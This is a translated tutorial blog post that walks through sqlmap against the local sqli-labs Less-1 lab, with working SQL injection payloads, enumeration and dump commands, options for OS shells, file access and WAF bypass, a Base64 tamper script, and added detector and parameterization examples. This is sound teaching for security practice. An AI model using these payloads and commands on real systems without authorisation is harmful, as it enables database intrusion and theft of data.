"Web Security Attack and Defense" uses sqli-labs to get acquainted with the powerful tool SQLmap, and I am also familiar with the use of this tool.
The basic steps of SQL injection:
- Determine the injection type
- Get database name
- Get data table name
- Get field name
- Retrieve data
1 Determine the type of injection
1.1 Get type
Use the -u parameter to specify the URL (sqli-labs Less-1):
sqlmap -u "http://localhost:4000/Less-1?id=1"
Note that the URL should include the request parameters (here id=1), because those parameters are what sqlmap tests.
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind (boolean-based blind injection)
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9623=9623 AND 'JjhO'='JjhO
Type: error-based (error-based injection)
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1' AND GTID_SUBSET(CONCAT(0x71767a7871,(SELECT (ELT(3702=3702,1))),0x716a6b6271),3702) AND 'oyIr'='oyIr
Type: time-based blind (time-based blind injection)
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))etaK) AND 'ACHt'='ACHt
Type: UNION query (UNION query injection)
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9510' UNION ALL SELECT NULL,CONCAT(0x71767a7871,0x65497456414974586b4c4a676479645971685666684c6163637353757955774841706b47726a6755,0x716a6b6271),NULL-- -
---
The id parameter above is injectable with 4 techniques (boolean-based, error-based, time-based, UNION), and the payload used for each is shown. SQLmap uses 5 SQL injection techniques:
- UNION query injection
- Error-based injection
- Boolean-based blind injection
- Time-based blind injection
- Stacked queries injection
If you are not familiar with these injection types, practice them on sqli-labs; see my previous article: https://blog.csdn.net/qq_43085611/article/details/112661431.
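As an added example (my own code, not from the post), a small Python detector that classifies request query strings into the four technique families sqlmap reported above, run over constructed access-log lines whose id values copy the payload shapes shown for Less-1. The log lines and the regexes are my own, and the regexes also cover a few well-known MySQL functions (BENCHMARK, EXTRACTVALUE, UPDATEXML) beyond the GTID_SUBSET and SLEEP seen on this page.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the post). The id= values repeat the
# payload shapes sqlmap reported for Less-1, URL-encoded as a server would log them.
SAMPLE_LOG = """\
127.0.0.1 - - [26/Jan/2021:16:00:42 +0800] "GET /Less-1?id=1 HTTP/1.1" 200 713
127.0.0.1 - - [26/Jan/2021:16:00:43 +0800] "GET /Less-1?id=1%27%20AND%209623%3D9623%20AND%20%27JjhO%27%3D%27JjhO HTTP/1.1" 200 713
127.0.0.1 - - [26/Jan/2021:16:00:44 +0800] "GET /Less-1?id=1%27%20AND%20GTID_SUBSET%28CONCAT%280x71767a7871%2C%28SELECT%20%28ELT%283702%3D3702%2C1%29%29%29%2C0x716a6b6271%29%2C3702%29%20AND%20%27oyIr%27%3D%27oyIr HTTP/1.1" 200 0
127.0.0.1 - - [26/Jan/2021:16:00:50 +0800] "GET /Less-1?id=1%27%20AND%20%28SELECT%208003%20FROM%20%28SELECT%28SLEEP%285%29%29%29etaK%29%20AND%20%27ACHt%27%3D%27ACHt HTTP/1.1" 200 713
127.0.0.1 - - [26/Jan/2021:16:00:51 +0800] "GET /Less-1?id=-9510%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x71767a7871%2C0x65%2C0x716a6b6271%29%2CNULL--%20- HTTP/1.1" 200 713
"""

# One pattern per technique family. Checked in this order because a UNION or
# error payload can also contain the "AND n=n" shape of the boolean test.
TECHNIQUES = [
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("time-based blind", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("error-based", re.compile(r"\b(?:GTID_SUBSET|EXTRACTVALUE|UPDATEXML)\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
]

# Pull the query string out of a Common Log Format request line
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+\S*\?(\S*)\s+HTTP/')

def classify(query_string):
    """Return the technique family whose signature appears in the decoded query string, else None."""
    decoded = unquote_plus(query_string)
    for name, pattern in TECHNIQUES:
        if pattern.search(decoded):
            return name
    return None

def scan_log(text):
    """Return (line_number, technique) for every request whose query string looks injected."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        technique = classify(match.group(1))
        if technique is not None:
            hits.append((number, technique))
    return hits

if __name__ == "__main__":
    for number, technique in scan_log(SAMPLE_LOG):
        print(f"line {number}: {technique}")
```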
1.2 POST or GET type
Use Burp Suite to capture the request. (The target page is a locally built site, usually accessed through localhost or 127.0.0.1, but Burp Suite does not capture requests to these two addresses; consider editing the hosts file so the site can be reached through another domain name.) Finally, save the captured request locally as a file named 1.txt.
Then use the -r parameter to specify the HTTP request file (-r REQUESTFILE: load HTTP request from a file):
sqlmap -r 1.txt
This method detects both GET and POST injection points, since the whole request (method, headers and body) is read from the file.
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2269=2269 AND 'fYWA'='fYWA
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1' AND GTID_SUBSET(CONCAT(0x716b6a7671,(SELECT (ELT(8383=8383,1))),0x7176786a71),8383) AND 'THdq'='THdq
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1253 FROM (SELECT(SLEEP(5)))PKdp) AND 'yWGz'='yWGz
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8764' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x766e654f656c6f7779676842616d704f53567a74486b645956614a4b527578794d6f44544775644b,0x7176786a71)-- -
If you look carefully at the messages SQLmap prints, you can see that it has saved the results of the run:
[16:00:42] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:00:42] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top' (location where results are saved)
[*] ending @ 16:00:42 /2021-01-26/
2 Get the database name
Use the command
sqlmap -r 1.txt --dbs
The database information returned:
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:05:51] [INFO] fetching database names
[16:05:51] [WARNING] reflective value(s) found and filtering out
[16:05:51] [INFO] retrieved: 'mysql'
[16:05:51] [INFO] retrieved: 'information_schema'
[16:05:51] [INFO] retrieved: 'performance_schema'
[16:05:51] [INFO] retrieved: 'sys'
[16:05:51] [INFO] retrieved: 'study'
[16:05:51] [INFO] retrieved: 'hello_ssm'
[16:05:51] [INFO] retrieved: 'dvwa'
[16:05:51] [INFO] retrieved: 'security'
[16:05:51] [INFO] retrieved: 'challenges'
available databases [9]:
[*] challenges
[*] dvwa
[*] hello_ssm
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] study
[*] sys
3 Get the data table name
Use the command
sqlmap -r 1.txt --tables
This command lists the tables of every database, so it is not used often.
The more common way to get table names is:
sqlmap -r 1.txt -D="security" --tables
Use -D to specify the database name to get the data table name of a specific database. The execution results are as follows:
[16:09:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:09:23] [INFO] fetching tables for database: 'security'
[16:09:23] [WARNING] reflective value(s) found and filtering out
[16:09:23] [INFO] retrieved: 'emails'
[16:09:23] [INFO] retrieved: 'referers'
[16:09:23] [INFO] retrieved: 'uagents'
[16:09:23] [INFO] retrieved: 'users'
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
[16:09:23] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'
[*] ending @ 16:09:23 /2021-01-26/
4 Get the field name
As when obtaining the table names above, it is best to also specify a table name:
sqlmap -r 1.txt -D="security" -T emails --columns
Besides the -D="security" form of giving an option value, the value may also be given without an equals sign or quotes, as in -T emails.
The execution results are as follows:
[16:13:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:13:59] [INFO] fetching columns for table 'emails' in database 'security'
[16:14:00] [WARNING] reflective value(s) found and filtering out
[16:14:00] [INFO] retrieved: 'id','int'
[16:14:00] [INFO] retrieved: 'email_id','varchar(30)'
Database: security
Table: emails
[2 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email_id | varchar(30) |
| id | int |
+----------+-------------+
[16:14:00] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'
[*] ending @ 16:14:00 /2021-01-26/
5 Get data
The command used is:
sqlmap -r 1.txt -D "security" -T emails -C email_id,id --dump
The execution results are as follows:
[16:17:19] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:17:19] [INFO] fetching entries of column(s) 'email_id, id' for table 'emails' in database 'security'
[16:17:19] [WARNING] reflective value(s) found and filtering out
[16:17:19] [INFO] retrieved: '[email protected]','1'
[16:17:19] [INFO] retrieved: '[email protected]','2'
[16:17:19] [INFO] retrieved: '[email protected]','3'
[16:17:19] [INFO] retrieved: '[email protected]','4'
[16:17:19] [INFO] retrieved: '[email protected]','5'
[16:17:19] [INFO] retrieved: '[email protected]','6'
[16:17:19] [INFO] retrieved: '[email protected]','7'
[16:17:19] [INFO] retrieved: '[email protected]','8'
Database: security
Table: emails
[8 entries]
+------------------------+----+
| email_id | id |
+------------------------+----+
| [email protected] | 1 |
| [email protected] | 2 |
| [email protected] | 3 |
| [email protected] | 4 |
| [email protected] | 5 |
| [email protected] | 6 |
| [email protected] | 7 |
| [email protected] | 8 |
+------------------------+----+
[16:17:19] [INFO] table 'security.emails' dumped to CSV file '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top/dump/security/emails.csv' (the dumped table)
[16:17:19] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'
[*] ending @ 16:17:19 /2021-01-26/
The dumped data is also saved as a CSV file, at the path shown above.
6 Other parameters
Configuration
- --level=LEVEL: where LEVEL is 1 to 5, the level of tests to perform (the higher the level, the more thorough the test, but the more requests are sent; the default is 1)
- --referer=REFERER: set the HTTP Referer header value (referer spoofing)
- --sql-shell: open an interactive SQL shell to run custom SQL statements
- --os-cmd=OSCMD or --os-shell: execute operating system commands
- --file-read=FILE: read a file from the back-end file system
- --file-write=FILE with --file-dest=FILE: write a local file to the back-end file system
- --tamper=TAMPER: use the given tamper script(s) to bypass WAF/IDS/IPS
Information gathering
- --users: enumerate DBMS users
- --passwords: enumerate the DBMS users' passwords (hashes)
- --current-db: retrieve the current database name
- --current-user: retrieve the current DBMS user name
- --is-dba: detect whether the current DBMS user is an administrator (DBA)
- --roles: enumerate the DBMS users' roles
7 Tamper
Tamper scripts are usually used to bypass a WAF. Take the simple base64encode tamper shipped with sqlmap as an example:
#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

# Priority decides the order in which this script runs when several tampers are chained
__priority__ = PRIORITY.LOW

def dependencies():
    # Nothing extra is needed for this tamper
    pass

def tamper(payload, **kwargs):
    """
    Base64-encodes all characters in a given payload

    >>> tamper("1' AND SLEEP(5)#")
    'MScgQU5EIFNMRUVQKDUpIw=='
    """

    # Encode the whole payload string; an empty payload is returned unchanged
    return encodeBase64(payload, binary=False) if payload else payload
A tamper script performs a transformation on the payload before it is sent. For example, some websites Base64-encode a parameter on the client before sending it, and the server Base64-decodes it after receiving the data. If sqlmap is used directly without a tamper, the payload is sent in plaintext; after the server's Base64 decoding it is no longer valid SQL, so the injection cannot succeed.
Usually you have to analyze specifically how the website sends its data and write a matching tamper script. Usage: --tamper=<module name>, where the module name is the script's file name (for example --tamper=base64encode).
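The Base64 round trip described above, as an added example that is my own code rather than the post's or sqlmap's: tamper() reproduces the base64encode script with the standard library, and the boolean-based payload sqlmap reported for Less-1 in section 1.1 is run through a constructed SQLite stand-in for the emails table, once with the string-spliced query the post describes and once with a bound parameter, to show that the Base64 layer is not a defence and parameterization is. The table rows and function names are assumptions.

```python
import base64
import binascii
import sqlite3

# Constructed in-memory stand-in for the sqli-labs "security.emails" table (not the real data)
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE emails (id INTEGER, email_id TEXT)")
db.executemany("INSERT INTO emails VALUES (?, ?)",
               [(1, "alice@example.com"), (2, "bob@example.com")])

def tamper(payload):
    """Same transformation as sqlmap's base64encode tamper, done with the standard library."""
    return base64.b64encode(payload.encode()).decode() if payload else payload

def server_decode(param):
    """The server-side step the post describes: Base64-decode the received parameter.
    A plaintext payload is not valid Base64, so it is rejected before any query runs,
    which is exactly why sqlmap needs the tamper to reach this endpoint."""
    try:
        return base64.b64decode(param, validate=True).decode()
    except (binascii.Error, UnicodeDecodeError):
        return None

def lookup_vulnerable(param):
    """Decoded value spliced into the SQL text (the Less-1 pattern): Base64 hides nothing
    from the database, the boolean payload still rewrites the WHERE clause."""
    value = server_decode(param)
    if value is None:
        return []
    return db.execute(f"SELECT id, email_id FROM emails WHERE id='{value}' LIMIT 1").fetchall()

def lookup_hardened(param):
    """Same endpoint with a bound parameter: the decoded value is compared as data only."""
    value = server_decode(param)
    if value is None:
        return []
    return db.execute("SELECT id, email_id FROM emails WHERE id=? LIMIT 1", (value,)).fetchall()

# The boolean-based payload sqlmap reported for Less-1 in section 1.1, and a false variant
TRUE_PAYLOAD = "1' AND 9623=9623 AND 'JjhO'='JjhO"
FALSE_PAYLOAD = "1' AND 9623=9624 AND 'JjhO'='JjhO"

if __name__ == "__main__":
    print("untampered  :", lookup_vulnerable(TRUE_PAYLOAD))          # [] (never decodes)
    print("vuln, true  :", lookup_vulnerable(tamper(TRUE_PAYLOAD)))  # row 1 comes back
    print("vuln, false :", lookup_vulnerable(tamper(FALSE_PAYLOAD))) # []
    print("hardened    :", lookup_hardened(tamper(TRUE_PAYLOAD)))    # [] (no such id)
```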